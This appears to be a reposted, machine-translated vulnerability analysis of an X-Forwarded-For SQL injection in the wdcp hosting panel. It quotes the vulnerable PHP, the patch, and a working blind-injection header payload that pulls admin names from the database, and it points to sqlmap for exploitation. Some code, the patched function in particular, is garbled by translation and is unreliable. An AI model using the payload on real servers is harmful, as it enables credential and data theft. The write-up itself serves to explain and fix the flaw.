Wdcp X-Forwarded-For Injection Vulnerability Analysis

Source: Internet
Author: User

Wdcp X-Forwarded-For Injection Vulnerability Analysis

0x1 vulnerability updates on the official website:

20130804 (2.5.8)

Fix an SQL injection security vulnerability and leak database information (must be upgraded)


Description 2.5.7 and earlier versions have the injection vulnerability. The user name and password of the wdcp background and the data of the whole wdcp database can be directly obtained.
Affected Version: earlier than or equal to 2.5.7, the latest version v2.5.11
0x2. Vulnerability Principle Analysis the vulnerability principle can be used to analyze the patch, or to analyze the wdcp x-Forwarded-For injection tool on the Internet. Download the tool link Baidu search. Compared with patch analysis, the payload of this tool is easier to find vulnerability details. First, build a v2.5.7 environment.
How to analyze payload? You can use wireshark to analyze the package issue of this tool.
We only pay attention to the data requested by the tool and the data returned by the server in the http protocol. Therefore, wireshark filtering should be written as follows: ip.addr == xx.xx.xx.xx and httpAnd then start capturing. Enter the ip addresses with vulnerabilities in the injection tool.



Click Batch InjectionIn this case, wireshark can capture the payload of the entire injection process, and the rest will analyze the wireshark data packets. . 192.168.0.102 is the ip address of my local Nic, and package 458 is a local GET request sent to the server. The request content is completely normal. Package 456 is the data returned by the server. Due to the normal request submitted, the normal page is returned and the length is 989 bytes. Therefore, we can draw a conclusion, if the returned result is not 989 bytes in length, it is not a normal GET data submission.
Continue to check the GET request content of package 486, X-Forwarded-For: 127.0.0.1'\r\n, \ R \ n is a line feed, you can ignore it, there is a single quotation mark behind 127.0.0.1, and then look at the length of the returned content of 484 is 54 bytes, a look at the urine, View Line-based text data: text/html(That is, the webpage html data returned by the page) is MySQL Query Error:select ltime from wd_loginlog where lip='127.0.0.1'' and state=1 order by id desc limit 10,1<br>. Finally, pay attention to the following: the injected page is the homepage of port 8080.


After analyzing this, I believe that the injection points and files with vulnerabilities can be searched.
Decrypt and decrypt the wdcp code. I wrote it in my previous blog. Then use notepad ++ (install the Light Exporer plug-in) to search in the wdcp directory. select ltime from wd_loginlog where lip


The injection occurs in member. func. php, and the key code is as follows:
global $db;    $ip=get_client_ip();    $q=$db->query("select ltime from wd_loginlog where lip='$ip' and state=1 order by id desc limit 10,1");    $r=$db->fetch_array($q);    $ctime=time();    if ($ctime-$r['ltime']<1800) return 1;    $q=$db->query("select ltime from wd_loginlog where lip='$ip' and state=1 order by id desc limit 2,1");    $r=$db->fetch_array($q);    $ctime=time();    if ($ctime-$r['ltime']<120) return 1;    else return 0;}


From the payload analysis above, we can find that $ipIs the injection point, so find the source of $ ip and look up, $ip=get_client_ip();$ Ip is obtained using the get_client_ip function. function get_client_ipThe Code is as follows. PS: function calls in PHP are case-insensitive.
Fun. inc. php
function Get_client_ip(){   if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))       $ip = getenv("HTTP_CLIENT_IP");   else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))       $ip = getenv("HTTP_X_FORWARDED_FOR");   else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))       $ip = getenv("REMOTE_ADDR");   else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))       $ip = $_SERVER['REMOTE_ADDR'];   else       $ip = "unknown";   return $ip;}


As you can see, the obtained $ ip can be directly obtained from X-Forwarded-For, and $ ip is not filtered. Let's take a look at the latest version of the repair solution. In the end, it is obvious that the * and 'and "of $ ip are filtered. Prevents injection.
Function Get_client_ip () {// echo getenv ("HTTP_X_FORWARDED_FOR"); // if (! Empty (getenv ("HTTP_X_FORWARDED_FOR") {echo getenv ("encrypt"); exit;} if "), "unknown") $ ip = getenv ("HTTP_CLIENT_IP"); else if (getenv ("condition") & strcasecmp (getenv ("HTTP_X_FORWARDED_FOR"), "unknown ")) $ ip = getenv ("HTTP_X_FORWARDED_FOR"); else if (getenv ("REMOTE_ADDR") & strcasecmp (getenv ("REMOTE_ADDR"), "unknown ")) $ ip = getenv ("REMOTE_ADDR"); else if (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], "unknown ")) $ ip = $ _ SERVER ['remote _ ADDR ']; else $ ip = "unknown"; // echo $ ip; return preg_replace ("/\ * | '| \"/isU "," ", $ ip); // filter this // return str_replace ("*", "", $ ip); // return $ ip ;}


After analyzing the cause of the vulnerability, let's see how the vulnerability payload is used.
At first glance, an error injection is reported, but the test is not successful, but it can be successful locally. So blind attention, guess -(
Go back to wireshark and check the complete payload. Then, the returned page is a normal page with a package containing code injection. Next we can see X-Forwarded-For: 127.0.0.1' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM wdcpdb.wd_member ORDER BY id LIMIT 0,1),1,1))=97) THEN 0x3132372e302e302e31 ELSE 0x28 END)) AND 'rRyy'='rRyy\r\n,
Its complete SQL is select ltime from wd_loginlog where lip='127.0.0.1' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM wdcpdb.wd_member ORDER BY id LIMIT 0,1),1,1))=97) THEN 0x3132372e302e302e31 ELSE 0x28 END)) AND 'rRyy'='rRyy' and state=1 order by id desc limit 10,1
It means to determine whether the ascii value of the first character of the name field sorted by id in the wdcpdb. wd_member table is 97, Character a. If it is returned to the normal page, and the simplified SQL is select ltime from wd_loginlog where lip='127.0.0.1' RLIKE(select 0x3132372e302e302e31) AND 'rRyy'='rRyy' and state=1 order by id desc limit 10,1If not, an error is reported, and the simplified SQL statement is: select ltime from wd_loginlog where lip='127.0.0.1' RLIKE(select 0x28) AND 'rRyy'='rRyy' and state=1 order by id desc limit 10,1, 0x28, leading to an error.
The actual usage of RLIKE is select * from table where column RLIKE 'a.*'In this example
select * from table where column = 'xx' RLIKE 0x28This will report an error. RLIKE 0x30 will not report an error.



If you know the vulnerability page and understand payload, you can directly drop sqlmap and use sqlmap.py -rHttp header injection.

0x3. Upgrade Vulnerability fix to the latest version 2.5.11
Or return $ip;Change return preg_replace("/\*|'|\"/isU","",$ip);Then it is encrypted into the wdcp encryption method.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.